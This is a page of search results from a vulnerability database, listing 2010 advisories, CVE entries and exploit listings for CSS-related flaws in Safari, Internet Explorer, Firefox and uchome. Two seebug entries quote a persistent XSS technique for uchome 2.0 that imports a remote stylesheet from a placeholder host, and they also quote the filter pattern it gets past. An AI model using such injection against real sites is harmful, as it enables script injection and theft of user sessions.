
5714 matches found

Check Point Advisories
added 2010/09/20 12:0 a.m. | 1 views

Apple Safari Webkit Button First-Letter Style Rendering Code Execution (CVE-2010-1392)

Safari is a web browsing application developed by Apple. Safari browsing functionality is built around the set of components called WebKit. WebKit is a development toolkit which allows third party developers to build applications that use Internet technologies such as HTML, HTTP, and others. A...

CVSS: 9.3 | AI score: 9.1 | EPSS: 0.13272
Exploits: 0

0day.today
added 2010/09/18 12:0 a.m. | 25 views

Firefox Plugin Parameter EnsureCachedAttrParamArrays Code Execution

Exploit for windows platform in category dos / poc =================================================================== Firefox Plugin Parameter EnsureCachedAttrParamArrays Code Execution =================================================================== Title : Firefox Plugin Parameter...

AI score: 7 | EPSS: 0.0734
Exploits: 5

NVD
added 2010/09/17 6:0 p.m. | 25 views

CVE-2010-3324

The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scriptin...

CVSS: 4.3 | AI score: 5.1 | EPSS: 0.26442
Exploits: 2 | References: 7

Prion
added 2010/09/17 6:0 p.m. | 21 views

Cross site scripting

The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scriptin...

CVSS: 4.3 | AI score: 5.3 | EPSS: 0.36865
Exploits: 3 | References: 7 | Affected Software: 5

Packet Storm
added 2010/09/11 12:0 a.m. | 26 views

ColdUserGroup 1.6 Bypass / Cross Site Scripting

Exploit Title: ColdUserGroup - Version 1.6 bypass/XSS Vulnerabilities Date: 09/09/2010 Author: Sangteamtham Software Link: http://www.coldgen.com/index.cfm?ColdGen=ProductDetails&ProductID=8 Version: 1.22 Tested on: Windows 7 1.Description: Built using Fusebox and adhering to CSS/XHTML standards...

AI score: 7.4
Exploits: 0

seebug.org
added 2010/09/09 12:0 a.m. | 17 views

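Microsoft IE CSS Handling Cross-Domain Information Disclosure Vulnerability

BUGTRAQ ID: 42993 Internet Explorer is the web browser bundled by default with the Windows operating system. Internet Explorer allows cross-origin content to be included, and its CSS parser is fault-tolerant when processing content. If a user injects certain content into a page and imports it as a style sheet, sensitive information from web pages in other domains can be obtained. Microsoft Internet Explorer 8.0 Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 Vendor patch: Microsoft ---------...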

AI score: 6.9
Exploits: 0

OpenVAS
added 2010/09/07 12:0 a.m. | 43 views

Mandriva Update for mozilla-thunderbird MDVSA-2010:169 (mozilla-thunderbird)

Check for the Version of mozilla-thunderbird OpenVAS Vulnerability Test Mandriva Update for mozilla-thunderbird MDVSA-2010:169 (mozilla-thunderbird) Authors: System Generated Check Copyright: Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can...

CVSS: 9.3 | AI score: 0.1 | EPSS: 0.07986
Exploits: 10 | References: 2

Exploit DB
added 2010/09/06 12:0 a.m. | 20 views

Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure

source: https://www.securityfocus.com/bid/42993/info Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to enforce the same-origin policy. An attacker can exploit this issue by enticing an unsuspecting user into viewing a page...

AI score: 7.4
Exploits: 0

ThreatPost
added 2010/09/04 3:5 p.m. | 4 views

Nasty Data-Stealing Bug Haunts Internet Explorer 8

There’s an unpatched vulnerability in Internet Explorer 8 that enables simple data-stealing attacks by Web-based attackers and could lead to an attacker hijacking a user’s authenticated session on a third-party site. The flaw, which a researcher said may have been known since 2008, lies in the wa...

Exploits: 0 | References: 5

seebug.org
added 2010/09/03 12:0 a.m. | 16 views

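uchome 2.0 Persistent XSS Vulnerability

Found by analysing the source code; the flawed location is fairly sensitive, and there are essentially no restrictions on exploitation. When customising the style of a personal home page, an external CSS file can be pulled in with @import. uchome 2.0 Temporary workaround: implode is probably a typo for import /expression|vbscript|javascript|import/i The following was tested successfully on uchome Simplified Chinese utf-8 2.0 with IE6, IE7 and IE8. @import urlhttp://xxx.com/1.css; includes a remote CSS file, and the XSS exploit can be written into 1.css. Code analysis: cptheme.php line 92 line 17 calls function checksecurity$str...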

AI score: 7.1
Exploits: 0

OpenVAS
added 2010/08/21 12:0 a.m. | 34 views

Debian Security Advisory DSA 2075-1 (xulrunner)

The remote host is missing an update to xulrunner announced via advisory DSA 2075-1. OpenVAS Vulnerability Test $Id: deb20751.nasl 6614 2017-07-07 12:09:12Z cfischer $ Description: Auto-generated from advisory DSA 2075-1 (xulrunner) Authors: Thomas Reinke Copyright: Copyright (c) 2010 E-Soft Inc...

CVSS: 9.3 | AI score: 1.2 | EPSS: 0.14816
Exploits: 17

OpenVAS
added 2010/08/21 12:0 a.m. | 31 views

Debian: Security Advisory (DSA-2075-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVSS: 9.8 | AI score: 8.8 | EPSS: 0.14816
Exploits: 17 | References: 3

0day.today
added 2010/08/06 12:0 a.m. | 22 views

Table2CSS Denial of Service PoC

Exploit for php platform in category dos / poc =============================== Table2CSS Denial of Service PoC =============================== ...

AI score: 7
Exploits: 0

Check Point Advisories
added 2010/08/04 12:0 a.m. | 2 views

Apple Safari Webkit CSS Charset Text Transformation Code Execution (CVE-2010-1770)

Safari is a web browsing application developed by Apple. Safari browsing functionality is built around the set of components called WebKit. WebKit is a development toolkit which allows third party developers to build applications that use Internet technologies such as HTML, HTTP, and others. A...

CVSS: 9.3 | AI score: 8.7 | EPSS: 0.04184
Exploits: 0

seebug.org
added 2010/07/31 12:0 a.m. | 24 views

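uchome Persistent XSS (tested on version 2.0)

Brief description: Found by analysing the source code; the flawed location is fairly sensitive, and there are essentially no restrictions on exploitation. Details: When customising the style of a personal home page, an external CSS file can be pulled in with @import. Proof of vulnerability: The following was tested successfully on uchome Simplified Chinese utf-8 2.0 with IE6, IE7 and IE8. @import urlhttp://xxx.com/1.css; includes a remote CSS file, and the XSS exploit can be written into 1.css. Code analysis: cptheme.php line 92 line 17 calls function checksecurity$str //run a series of filters to verify whether the CSS is valid $filter = array '//\n\r.+?\n\r\//is', '/^a-z0-9+/i',...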

AI score: 7.1
Exploits: 0

NVD
added 2010/07/30 8:30 p.m. | 18 views

CVE-2010-2752

Integer overflow in an array class in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allows remote attackers to execute arbitrary code by placing many Cascading Style Sheets (CSS) values in an array,...

CVSS: 9.3 | AI score: 9.7 | EPSS: 0.07986
Exploits: 5 | References: 6

Prion
added 2010/07/30 8:30 p.m. | 27 views

Integer overflow

Integer overflow in an array class in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allows remote attackers to execute arbitrary code by placing many Cascading Style Sheets (CSS) values in an array,...

CVSS: 9.3 | AI score: 8.4 | EPSS: 0.07986
Exploits: 5 | References: 6 | Affected Software: 3

Prion
added 2010/07/30 8:30 p.m. | 18 views

Memory corruption

The counters functionality in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of servi...

CVSS: 9.3 | AI score: 7.9 | EPSS: 0.03505
Exploits: 0 | References: 21 | Affected Software: 1

CVE
added 2010/07/30 8:0 p.m. | 76 views

CVE-2010-1784

CVE-2010-1784 is listed in MiracleLinux AXSA-2011-34:01 as a vulnerability fixed in webkitgtk-1.2.6-2.AXS4. The advisory groups CVE-2010-1784 with other WebKitGTK+/WebKit flaws and notes that these issues are resolved by updating the affected package. The provided documents do not include detaile...

CVSS: 9.3 | AI score: 9.2 | EPSS: 0.03505
Exploits: 0 | References: 21 | Affected Software: 2

Cvelist
added 2010/07/30 8:0 p.m. | 24 views

CVE-2010-1784

The counters functionality in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of servi...

AI score: 9.3 | EPSS: 0.03505
Exploits: 0 | References: 21